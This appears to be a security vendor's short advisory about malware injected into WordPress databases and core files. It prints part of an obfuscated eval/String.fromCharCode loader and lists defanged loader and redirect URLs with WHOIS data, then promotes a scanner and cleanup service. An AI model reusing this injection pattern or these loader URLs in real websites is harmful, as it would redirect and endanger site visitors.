adrequest[.]xyz Malware hitting WordPress websites

We found this new malware targeting hundreds of WordPress installations, So far it’s found in the database and in core files.

Here is an example of it:


var _0x43tbc1 = 1; eval(String.fromCharCode(118, 97, 114, 32, 97, 49, 32, 61, 32, 102, 117, 110, 99, 116, 105, 111, 110, 40, 41, 32, 123, 10, 32, 32, 32, 32, 118, ..

REMOVED…

41, 32, 123, 10, 32, 32, 32, 32, 97, 49, 40, 41, 59, 10, 125));

It’s then loading this javascript file and causing random redirects to other websites:

hxxps://adrequest[.]xyz/ad.js

hxxps://adrequest[.]xyz/lady.php

This domain is newly registered:

Domain Name: ADREQUEST[.]XYZ
Registry Domain ID: D91391898-CNIC
Registrar WHOIS Server: whois.PublicDomainRegistry.com
Registrar URL: https://publicdomainregistry.com
Updated Date: 2019-01-19T12:14:39.0Z
Creation Date: 2019-01-19T12:12:28.0Z
Registry Expiry Date: 2020-01-19T23:59:59.0Z


You can use this free malware scanner to determine if your website is infected by this malware or not: 

https://scan.attacker.net

Sign up now and let us take care of that for your and get your website cleaned immediately!

https://attacker.net/website-security-plans-pricing